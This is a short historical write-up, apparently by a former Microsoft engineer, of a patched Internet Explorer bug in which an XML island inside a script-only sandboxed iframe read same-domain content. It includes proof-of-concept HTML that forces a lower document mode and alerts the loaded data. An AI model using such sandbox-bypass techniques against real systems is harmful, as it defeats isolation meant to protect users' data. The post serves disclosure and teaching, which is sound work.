A sandboxed iframe with only allow-scripts set is supposed to be unable to load or read same-domain content — XMLHttpRequest is correctly blocked. But the old IE-specific <xml> island element, when given an external src, bypassed that restriction and happily fetched and exposed the content.
<!-- parent page (IE9 docMode to keep XML island behavior) -->
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9" />
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>

<!-- sandboxed.html -->
<xml id="oXml" src="xml.xml"></xml>
<script>
function main()
{
    alert(oXml.xml);
}
</script>
<input type="button" value="Read XML" onclick="main()" />
The XML island loaded the external file silently, and its .xml property exposed the full response. The parent had to be in IE9 document mode for this to work, since IE10 rendered XML islands as HTML — but as the notes in the original file pointed out, an attacker could simply force a lower document mode. A variation using IE8 document mode was filed alongside this one.
Variation: IE8 Document Mode
The same technique worked identically when the parent page was set to IE8 emulation mode instead of IE9, confirming the bypass was not tied to a specific document mode version.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.